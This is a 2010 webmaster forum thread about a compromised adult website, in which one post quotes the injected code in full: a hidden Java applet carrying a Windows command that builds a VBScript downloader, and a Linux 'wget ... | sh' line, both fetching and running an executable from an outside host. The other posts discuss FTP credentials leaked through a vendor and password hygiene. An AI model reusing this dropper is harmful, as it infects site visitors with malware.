Trojan horse on my sites

LD · 2010-06-03, 07:27 AM

Avast is reporting problems on some of my sites:

Code:

http://www.lusciousdelights.com/
http://www.joyporn.net/
http://sleazyporntube.com/
http://www.pantyerotica.com/
http://fuckingfreeforall.com/

I am working on getting it fixed, sorry for the inconvenience.

Useless · 2010-06-03, 09:14 AM

I have AVG integrated with my Google search, and they're still saying your sites are safe, so that's good. As long as you get it fixed before Google begins de-listing you, you'll be fine. I clicked-through to all of them, and only the free for all site is popping something suspicious. Something about an unverified application attempting to run.

Cleo · 2010-06-03, 09:34 AM

Quote:

Originally Posted by Useless Warrior

the free for all site is popping something suspicious. Something about an unverified application attempting to run.

This is it,

Code:

<applet width='0' height='0' code='Client.class' archive='Client.jar'>
<param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs   http://galengroup.org/1.exe %temp%\update.exe'>
<param name='windows2' value=''>

<param name='unix1' value="">
<param name='unix2' value="">

<param name='linux1' value="wget http://galengroup.org/1.exe -O- | sh">
<param name='linux2' value="">

</applet>

LD · 2010-06-03, 10:37 AM

Chris at Colo-Cation is on it, looks like it's fixed. I just notified him this morning a little while ago, so it was a very quick response and fix.

It looks like someone uploaded something via ftp using my login. The interesting thing is, I recently entered my login info in the "hidden" area at JBM software's support forum for Jeremy to check something out. That's the only time I have ever given this info out...hmmm

cd34 · 2010-06-03, 11:47 AM

That would explain the other client with tubex being compromised from the same IP.

LeRoy · 2010-06-03, 12:03 PM

Is this a tubex related incident or JBM Soft?

All of a sudden I'm a little worried now.

cd34 · 2010-06-03, 12:16 PM

The hacker used the FTP username/password to modify a few files on the server. Generally when that happens, the username/password has been leaked somewhere through a keylogger/spyware/trojan or, like this case, a vendor storing the user/password/hostname in the clear somewhere.

When you give a password to a vendor, you should change it after they are done, or, change it to something, give it to them, and then change it after they are done.

You would be surprised at the frequency this happens.

Cleo · 2010-06-03, 12:22 PM

Quote:

Originally Posted by LeRoy

Is this a tubex related incident or JBM Soft?

Quote:

Originally Posted by cd34

When you give a password to a vendor, you should change it after they are done, or, change it to something, give it to them, and then change it after they are done.

This is why I always add a user name with a temp password to my server that I then change after they are done.

I did this just last month after I wanted JBM Soft to take a look at my install of TubeX.

LD · 2010-06-03, 02:17 PM

Quote:

Originally Posted by cd34

The hacker used the FTP username/password to modify a few files on the server. Generally when that happens, the username/password has been leaked somewhere through a keylogger/spyware/trojan or, like this case, a vendor storing the user/password/hostname in the clear somewhere.

When you give a password to a vendor, you should change it after they are done, or, change it to something, give it to them, and then change it after they are done.

You would be surprised at the frequency this happens.

Thanks for getting fixed so quickly.

Guess you can't be too careful...live and learn.

SimonT · 2010-06-03, 03:43 PM

Had this happen to me too but not with JBM - created a temp ftp account and sure enough after the company had used it someone else sneaked in and installed a load of crap on the server.

2010-06-03, 09:14 AM	#2
Useless Certified Nice Person Join Date: Oct 2003 Location: Dirty Undies, NY Posts: 11,268	I have AVG integrated with my Google search, and they're still saying your sites are safe, so that's good. As long as you get it fixed before Google begins de-listing you, you'll be fine. I clicked-through to all of them, and only the free for all site is popping something suspicious. Something about an unverified application attempting to run. __________________ Click here to purchase a bridge I'm selling.

2010-06-03, 10:37 AM	#4
LD wtfwjd? Join Date: May 2007 Posts: 2,103	Chris at Colo-Cation is on it, looks like it's fixed. I just notified him this morning a little while ago, so it was a very quick response and fix. It looks like someone uploaded something via ftp using my login. The interesting thing is, I recently entered my login info in the "hidden" area at JBM software's support forum for Jeremy to check something out. That's the only time I have ever given this info out...hmmm __________________ Artisteer Wordpress Theme Generator Create Custom Themes! My Little Network

2010-06-03, 11:47 AM	#5
cd34 a.k.a. Sparky Join Date: Sep 2004 Location: West Palm Beach, FL, USA Posts: 2,396	That would explain the other client with tubex being compromised from the same IP. __________________ SnapReplay.com a different way to share photos - iPhone & Android

2010-06-03, 12:03 PM	#6
LeRoy "Young dumb and full of cum" Join Date: Jun 2007 Location: Porn Valley Posts: 2,370	Is this a tubex related incident or JBM Soft? All of a sudden I'm a little worried now. __________________ JAPANESE ADULT AFFILIATE PROGRAM

2010-06-03, 12:16 PM	#7
cd34 a.k.a. Sparky Join Date: Sep 2004 Location: West Palm Beach, FL, USA Posts: 2,396	The hacker used the FTP username/password to modify a few files on the server. Generally when that happens, the username/password has been leaked somewhere through a keylogger/spyware/trojan or, like this case, a vendor storing the user/password/hostname in the clear somewhere. When you give a password to a vendor, you should change it after they are done, or, change it to something, give it to them, and then change it after they are done. You would be surprised at the frequency this happens. __________________ SnapReplay.com a different way to share photos - iPhone & Android

2010-06-03, 03:43 PM	#10
SimonT Well you know boys, a nuclear reactor is a lot like women. You just have to read the manual and press the right button Join Date: Sep 2003 Location: United Kingdom Posts: 150	Had this happen to me too but not with JBM - created a temp ftp account and sure enough after the company had used it someone else sneaked in and installed a load of crap on the server. __________________ Make $$$ With Us SimonT ICQ : 270972432